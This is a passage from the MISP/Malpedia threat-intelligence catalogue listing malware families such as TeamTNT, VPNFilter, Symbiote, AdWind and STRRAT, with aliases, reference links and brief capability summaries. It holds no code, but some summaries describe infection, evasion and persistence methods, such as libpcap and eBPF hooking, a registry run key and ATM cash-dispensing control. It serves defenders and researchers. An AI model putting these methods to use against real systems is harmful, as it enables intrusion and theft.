The tag is: misp-galaxy:malpedia="Sunless"

Sunless is also known as:

Table 2477. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless

https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/

sustes miner

Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.

The tag is: misp-galaxy:malpedia="sustes miner"

sustes miner is also known as:

Table 2478. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes

https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/

Suterusu

The tag is: misp-galaxy:malpedia="Suterusu"

Suterusu is also known as:

  • HCRootkit

Table 2479. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.suterusu

https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis/

Symbiote

A malware capable of capturing credentials and enabling backdoor access, implemented as a userland rootkit. It uses three methods for hiding its network activity, by hooking and hijacking 1) fopen/fopen64, 2) eBPF, 3) a set of libpcap functions.

The tag is: misp-galaxy:malpedia="Symbiote"

Symbiote is also known as:

Table 2481. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.symbiote

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/

https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/

https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html

https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat

https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote

TeamTNT

Since Fall 2019, Team TNT is a well known threat actor which targets *nix based systems and misconfigured Docker container environments. It has constantly evolved its capabilities for its cloud-based cryptojacking operations. They have shifted their focus on compromising Kubernetes Clusters.

The tag is: misp-galaxy:malpedia="TeamTNT"

TeamTNT is also known as:

Table 2484. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt

https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials

https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment

https://www.trendmicro.com/en_us/research/21/l/more-tools-in-the-arsenal-how-teamtnt-used-compromised-docker-hu.html

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

https://unit42.paloaltonetworks.com/atoms/thieflibra/

https://unit42.paloaltonetworks.com/atoms/adept-libra/

https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/

https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server

https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools

https://sysdig.com/blog/teamtnt-aws-credentials/

https://tolisec.com/active-crypto-mining-operation-by-teamtnt/

https://www.trendmicro.com/en_ae/research/21/k/teamtnt-upgrades-arsenal-refines-focus-on-kubernetes-and-gpu-env.html

https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

Torii

The tag is: misp-galaxy:malpedia="Torii"

Torii is also known as:

Table 2487. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii

https://blog.avast.com/new-torii-botnet-threat-research

Trump Bot

The tag is: misp-galaxy:malpedia="Trump Bot"

Trump Bot is also known as:

Table 2488. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot

http://paper.seebug.org/345/

tsh

The tag is: misp-galaxy:malpedia="tsh"

tsh is also known as:

Table 2490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh

https://github.com/creaktive/tsh

Tsunami (ELF)

The tag is: misp-galaxy:malpedia="Tsunami (ELF)"

Tsunami (ELF) is also known as:

  • Amnesia

  • Muhstik

  • Radiation

Table 2491. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

http://get.cyberx-labs.com/radiation-report

https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/

https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/

https://blog.aquasec.com/fileless-malware-container-security

https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134

https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039

https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt

https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server

https://asec.ahnlab.com/en/54647/

https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/

https://sysdig.com/blog/muhstik-malware-botnet-analysis/

https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.

The tag is: misp-galaxy:malpedia="Unidentified Linux 001"

Unidentified Linux 001 is also known as:

Table 2494. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Unidentified ELF 004

Implant used by APT31 on compromised SOHO infrastructure, tries to camouflage as a tool ("unifi-video") related to Ubiquiti UniFi surveillance cameras.

The tag is: misp-galaxy:malpedia="Unidentified ELF 004"

Unidentified ELF 004 is also known as:

Table 2495. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_004

https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/

Unidentified ELF 006 (Tox Backdoor)

Enables remote execution of scripts on a host, communicates via Tox.

The tag is: misp-galaxy:malpedia="Unidentified ELF 006 (Tox Backdoor)"

Unidentified ELF 006 (Tox Backdoor) is also known as:

Table 2497. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_006

https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers

Hive (Vault 8)

The tag is: misp-galaxy:malpedia="Hive (Vault 8)"

Hive (Vault 8) is also known as:

Table 2498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.vault8_hive

https://wikileaks.org/vault8/

https://github.com/infoskirmish/hive

VPNFilter

The tag is: misp-galaxy:malpedia="VPNFilter"

VPNFilter is also known as:

Table 2500. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

https://blog.talosintelligence.com/2022/02/threat-advisory-cyclops-blink.html

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

https://blog.talosintelligence.com/2018/05/VPNFilter.html

https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1

https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-054A%20New%20Sandworm%20Malware%20Cyclops%20Blink%20Replaces%20VPN%20Filter.pdf

https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware

https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/

https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities

https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/

WatchBog

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

The tag is: misp-galaxy:malpedia="WatchBog"

WatchBog is also known as:

Table 2501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog

https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/

elf.wellmess

The tag is: misp-galaxy:malpedia="elf.wellmess"

elf.wellmess is also known as:

Table 2503. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://community.riskiq.com/article/541a465f/description

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://us-cert.cisa.gov/ncas/alerts/aa21-116a

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://services.global.ntt/en-us/insights/blog/the-layered-infrastructure-operated-by-apt29

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

WHIRLPOOL

The tag is: misp-galaxy:malpedia="WHIRLPOOL"

WHIRLPOOL is also known as:

Table 2504. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.whirlpool

https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0

Xaynnalc

The tag is: misp-galaxy:malpedia="Xaynnalc"

Xaynnalc is also known as:

Table 2510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc

https://twitter.com/michalmalik/status/846368624147353601

xdr33

According to 360 netlab, this backdoor was derived from the leaked CIA Hive project. It propagates via a vulnerability in F5 and communicates using SSL with a forged Kaspersky certificate.

The tag is: misp-galaxy:malpedia="xdr33"

xdr33 is also known as:

Table 2512. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xdr33

https://blog.netlab.360.com/headsup_xdr33_variant_of_ciahive_emeerges/

XOR DDoS

Linux DDoS C&C Malware

The tag is: misp-galaxy:malpedia="XOR DDoS"

XOR DDoS is also known as:

  • XORDDOS

Table 2513. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/

https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html

https://www.crowdstrike.com/blog/linux-targeted-malware-increased-by-35-percent-in-2021/

https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/

https://en.wikipedia.org/wiki/Xor_DDoS

https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/

https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/

http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html

https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf

https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html

https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf

ZeroBot

ZeroBot is a Go-based botnet that spreads primarily through IoT and web application vulnerabilities. It is offered as malware as a service (MaaS) and infrastructure overlaps with DDoS-for-hire services seized by the FBI in December 2022.

The tag is: misp-galaxy:malpedia="ZeroBot"

ZeroBot is also known as:

  • ZeroStresser

Table 2514. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zerobot

https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/

ZHtrap

The tag is: misp-galaxy:malpedia="ZHtrap"

ZHtrap is also known as:

Table 2515. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zhtrap

https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/

Zollard

The tag is: misp-galaxy:malpedia="Zollard"

Zollard is also known as:

  • darlloz

Table 2516. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard

https://blogs.cisco.com/security/the-internet-of-everything-including-malware

ZuoRAT

According to Black Lotus Labs, ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules).

The tag is: misp-galaxy:malpedia="ZuoRAT"

ZuoRAT is also known as:

Table 2517. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.zuo_rat

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/

AutoCAD Downloader

Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.

The tag is: misp-galaxy:malpedia="AutoCAD Downloader"

AutoCAD Downloader is also known as:

  • Acad.Bursted

  • Duxfas

Table 2518. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad

https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft

https://github.com/Hopfengetraenk/Fas-Disasm

GuiInject

The tag is: misp-galaxy:malpedia="GuiInject"

GuiInject is also known as:

Table 2520. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject

https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/

Phenakite

The tag is: misp-galaxy:malpedia="Phenakite"

Phenakite is also known as:

  • Dakkatoni

Table 2522. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.phenakite

https://malware4all.blogspot.com/2021/05/grab-your-own-copy-phenakite-ios.html

Postlo

The tag is: misp-galaxy:malpedia="Postlo"

Postlo is also known as:

Table 2524. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.postlo

https://twitter.com/opa334dev/status/1374754519268098051

WireLurker (iOS)

The iOS malware that is installed over USB by osx.wirelurker

The tag is: misp-galaxy:malpedia="WireLurker (iOS)"

WireLurker (iOS) is also known as:

Table 2526. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

AdWind

Part of Malware-as-service platform Used as a generic name for Java-based RAT Functionality - collect general system and user information - terminate process -log keystroke -take screenshot and access webcam - steal cache password from local or web forms - download and execute Malware - modify registry - download components - Denial of Service attacks - Acquire VPN certificates

Initial infection vector 1. Email to JAR files attached 2. Malspam URL to downlaod the malware

Persistence - Runkey - HKCU\Software\Microsoft\Windows\current version\run

Hiding Uses attrib.exe

Notes on Adwind The malware is not known to be proxy aware

The tag is: misp-galaxy:malpedia="AdWind"

AdWind is also known as:

  • AlienSpy

  • Frutas

  • JBifrost

  • JSocket

  • Sockrat

  • UNRECOM

Table 2528. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind

https://research.checkpoint.com/malware-against-the-c-monoculture/

http://malware-traffic-analysis.net/2017/07/04/index.html

https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885

https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/

https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html

https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat

https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat

https://blogs.seqrite.com/evolution-of-jrat-java-malware/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html

https://citizenlab.ca/2015/12/packrat-report/

Adzok

The tag is: misp-galaxy:malpedia="Adzok"

Adzok is also known as:

Table 2529. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok

https://citizenlab.ca/2015/12/packrat-report/

DynamicRAT

DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.

The tag is: misp-galaxy:malpedia="DynamicRAT"

DynamicRAT is also known as:

  • DYNARAT

Table 2533. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.dynamicrat

https://gi7w0rm.medium.com/dynamicrat-a-full-fledged-java-rat-1a2dabb11694

EpicSplit RAT

EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string "packet" as a packet delimiter.

The tag is: misp-galaxy:malpedia="EpicSplit RAT"

EpicSplit RAT is also known as:

Table 2534. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.epicsplit

https://www.zscaler.com/blogs/security-research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat

FEimea RAT

The tag is: misp-galaxy:malpedia="FEimea RAT"

FEimea RAT is also known as:

Table 2535. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat

https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

IceRat

According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.

The tag is: misp-galaxy:malpedia="IceRat"

IceRat is also known as:

Table 2536. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat

https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp

JavaDispCash

JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM’s local application and the goal is to remotely control its operation. The malware’s primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.

The tag is: misp-galaxy:malpedia="JavaDispCash"

JavaDispCash is also known as:

Table 2537. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash

https://twitter.com/r3c0nst/status/1111254169623674882

https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore

jRAT

jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.

The tag is: misp-galaxy:malpedia="jRAT"

jRAT is also known as:

  • Jacksbot

Table 2539. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat

https://research.checkpoint.com/malware-against-the-c-monoculture/

https://www.eff.org/files/2018/01/29/operation-manul.pdf

https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/

https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered

https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/

jSpy

The tag is: misp-galaxy:malpedia="jSpy"

jSpy is also known as:

Table 2540. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy

https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/

Qarallax RAT

According to SpiderLabs, in May 2015 the "company" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).

The tag is: misp-galaxy:malpedia="Qarallax RAT"

Qarallax RAT is also known as:

Table 2542. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat

http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/

QRat

QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, …​), and it comes as a SaaS. For additional historical context, please see jar.qarallax.

The tag is: misp-galaxy:malpedia="QRat"

QRat is also known as:

  • Quaverse RAT

Table 2544. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/

https://www.digitrustgroup.com/java-rat-qrat/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/

https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT—​Remote-Access-as-a-Service/

Ratty

Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.

The tag is: misp-galaxy:malpedia="Ratty"

Ratty is also known as:

Table 2545. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty

https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

Sorillus RAT

Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool’s creator and distributor, a YouTube user known as "Tapt", asserts that the tool is able to collect the following information from its target: - HardwareID - Username - Country - Language - Webcam - Headless - Operating system - Client Version

The tag is: misp-galaxy:malpedia="Sorillus RAT"

Sorillus RAT is also known as:

Table 2546. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus

https://abnormalsecurity.com/blog/tax-customers-sorillus-rat

STRRAT

STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird.

Since Version 1.2 and above, STRRAT was infamous for its ransomware-like behavior of appending the file name extension .crimson to files. Version 1.5 is notably more obfuscated and modular than previous versions, but the backdoor functions mostly remain the same: collect browser passwords, run remote commands and PowerShell, log keystrokes, among others. Version 1.5 of STRRAT Malware includes a proper encryption routine, though currently pretty simple to revert.

The tag is: misp-galaxy:malpedia="STRRAT"

STRRAT is also known as:

Table 2547. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://forensicitguy.github.io/strrat-attached-to-msi/

https://twitter.com/MsftSecIntel/status/1395138347601854465

https://www.jaiminton.com/reverse-engineering/strrat#

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain

https://www.jaiminton.com/reverse-engineering/strrat

https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/

https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1

https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://www.gdatasoftware.com/blog/strrat-crimson

https://isc.sans.edu/diary/rss/27798

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

SupremeBot

The tag is: misp-galaxy:malpedia="SupremeBot"

SupremeBot is also known as:

  • BlazeBot

Table 2548. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot

https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/

Verblecon

This malware seems to be used for attacks installing cyptocurrency miners on infected machines. Other indicators leads to the assumption that attackers may also use this malware for other purposes (e.g. stealing access tokens for Discord chat app). Symantec describes this malware as complex and powerful: The malware is loaded as a server-side polymorphic JAR file.

The tag is: misp-galaxy:malpedia="Verblecon"

Verblecon is also known as:

Table 2549. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/jar.verblecon

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/verblecon-sophisticated-malware-cryptocurrency-mining-discord

AIRBREAK

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.

The tag is: misp-galaxy:malpedia="AIRBREAK"

AIRBREAK is also known as:

  • Orz

Table 2550. Table References

Links

